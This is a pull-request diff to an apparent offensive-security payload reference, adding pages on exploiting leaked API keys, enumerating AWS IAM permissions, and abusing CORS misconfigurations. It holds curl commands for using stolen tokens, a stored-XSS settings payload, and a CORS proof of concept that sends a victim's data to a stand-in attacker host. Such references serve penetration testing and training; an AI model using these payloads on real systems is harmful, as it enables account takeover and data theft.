[pull] master from swisskyrepo:master

.github/FUNDING.yml

@@ -0,0 +1,5 @@
+# These are supported funding model platforms
+
+github: # Replace with up to 4 GitHub Sponsors-enabled usernames e.g., [user1, user2]
+ko_fi: swissky # Replace with a single Ko-fi username
+custom: https://www.buymeacoffee.com/swissky

API Key Leaks/README.md

@@ -0,0 +1,93 @@
+# API Key Leaks
+
+> The API key is a unique identifier that is used to authenticate requests associated with your project. Some developpers might hardcode them or leave it on public shares.
+
+## Summary
+
+- [Tools](#tools)
+- [Exploit](#exploit)
+    - [Algolia](#algolia)
+    - [AWS Access Key ID & Secret](#aws-access-key-id--secret)
+    - [Slack API Token](#slack-api-token)
+    - [Facebook Access Token](#facebook-access-token)
+    - [Github client id and client secret](#github-client-id-and-client-secret)
+    - [Twilio Account_sid and Auth Token](#twilio-account_sid-and-auth-token)
+    - [Twitter API Secret](#twitter-api-secret)
+    - [Twitter Bearer Token](#twitter-bearer-token)
+    - [Gitlab Personal Access Token](#gitlab-personal-access-token)
+
+## Tools
+
+- [KeyFinder - is a tool that let you find keys while surfing the web!](https://github.com/momenbasel/KeyFinder)
+- [Keyhacks - is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid.](https://github.com/streaak/keyhacks)
+
+## Exploit
+
+The following commands can be used to takeover accounts or extract personnal informations from the API using the leaked token.
+
+### Algolia 
+
+```powershell
+curl --request PUT \
+  --url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
+  --header 'content-type: application/json' \
+  --header 'x-algolia-api-key: <example-key>' \
+  --header 'x-algolia-application-id: <example-application-id>' \
+  --data '{"highlightPreTag": "<script>alert(1);</script>"}'
+```
+
+### AWS Access Key ID & Secret
+
+```powershell
+git clone https://github.com/andresriancho/enumerate-iam
+cd enumerate-iam
+./enumerate-iam.py --access-key AKIA... --secret-key XXX..
+```
+
+### Slack API Token
+
+```powershell
+curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
+```
+
+### Facebook Access Token
+
+```powershell
+curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
+```
+
+### Github client id and client secret
+
+```powershell
+curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
+```
+
+### Twilio Account_sid and Auth token
+
+```powershell
+curl -X GET 'https://api.twilio.com/2010-04-01/Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
+```
+
+### Twitter API Secret
+
+```powershell
+curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
+```
+
+### Twitter Bearer Token
+
+```powershell
+curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
+```
+
+### Gitlab Personal Access Token
+
+```powershell
+curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
+```
+
+
+## References
+
+* [Finding Hidden API Keys & How to use them - Sumit Jain - August 24, 2019](https://medium.com/@sumitcfe/finding-hidden-api-keys-how-to-use-them-11b1e5d0f01d)
+* [Private API key leakage due to lack of access control - yox - August 8, 2018](https://hackerone.com/reports/376060)

AWS Amazon Bucket S3/README.md

@@ -40,7 +40,7 @@
 		result = s3.list_buckets()
 		print(result)
 	except Exception as e:
-		print(e
+		print(e)
 	```
 
 ## AWS Configuration
@@ -184,6 +184,32 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 
 
+## Enumerate IAM permissions
+
+Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
+
+```powershell
+git clone [email protected]:andresriancho/enumerate-iam.git
+cd enumerate-iam/
+pip install -r requirements.txt
+./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
+2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
+2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
+2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
+    "RoleDetailList": [
+        {
+            "Tags": [], 
+            "AssumeRolePolicyDocument": {
+                "Version": "2008-10-17", 
+                "Statement": [
+                    {
+...
+2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
+2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
+2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
+2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
+2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
+```
 
 ## References
 
@@ -192,3 +218,6 @@ For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws
 * [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
 * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
+* [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
+* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
+* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf)

BOOKS.md

@@ -0,0 +1,22 @@
+# Book's list
+
+Grab a book and relax, these ones are the best security books (in my opinion).
+
+- [Web Hacking 101](https://leanpub.com/web-hacking-101)
+- [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
+- [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
+- [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
+- [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
+- [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
+- [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
+- [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
+- [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
+- [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
+- [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
+- [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
+- [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
+- [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
+- [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
+- [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
+- [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
+- [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)

CORS Misconfiguration/README.md

@@ -0,0 +1,90 @@
+# CORS Misconfiguration
+
+> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. 
+
+## Summary
+
+* [Prerequisites](#prerequisites)
+* [Exploitation](#exploitation)
+* [References](#references)
+
+## Prerequisites
+
+* BURP HEADER> `Origin: https://evil.com`
+* VICTIM HEADER> `Access-Control-Allow-Credential: true`
+* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com`
+
+## Exploitation
+
+Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**.
+
+### Vulnerable example 
+
+```powershell
+GET /endpoint HTTP/1.1
+Host: victim.example.com
+Origin: https://evil.com
+Cookie: sessionid=... 
+
+HTTP/1.1 200 OK
+Access-Control-Allow-Origin: https://evil.com
+Access-Control-Allow-Credentials: true 
+
+{"[private API key]"}
+```
+
+### Proof of concept
+
+```js
+var req = new XMLHttpRequest(); 
+req.onload = reqListener; 
+req.open('get','https://victim.example.com/endpoint',true); 
+req.withCredentials = true;
+req.send();
+
+function reqListener() {
+    location='//atttacker.net/log?key='+this.responseText; 
+};
+```
+
+or 
+
+```html
+<html>
+     <body>
+         <h2>CORS PoC</h2>
+         <div id="demo">
+             <button type="button" onclick="cors()">Exploit</button>
+         </div>
+         <script>
+             function cors() {
+             var xhr = new XMLHttpRequest();
+             xhr.onreadystatechange = function() {
+                 if (this.readyState == 4 && this.status == 200) {
+                 document.getElementById("demo").innerHTML = alert(this.responseText);
+                 }
+             };
+              xhr.open("GET",
+                       "https://victim.example.com/endpoint", true);
+             xhr.withCredentials = true;
+             xhr.send();
+             }
+         </script>
+     </body>
+ </html>
+```
+
+## Bug Bounty reports
+
+* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)
+* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147)
+* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200)
+* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249)
+* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298)
+
+## References
+
+* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)
+* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/)
+* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/)

CRLF injection/README.md → CRLF Injection/README.md

@@ -1,8 +1,16 @@
 # CRLF
 
-The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
+>The term CRLF refers to Carriage Return (ASCII 13, \r) Line Feed (ASCII 10, \n). They're used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems. For example: in Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.
 
-A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
+>A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.
+
+## Summary
+
+- [CRLF - Add a cookie](#crlf---add-a-cookie)
+- [CRLF - Add a cookie - XSS Bypass](#crlf---add-a-cookie---xss-bypass)
+- [CRLF - Write HTML](#crlf---write-html)
+- [CRLF - Filter Bypass](#crlf---filter-bypass)
+- [References](#references)
 
 ## CRLF - Add a cookie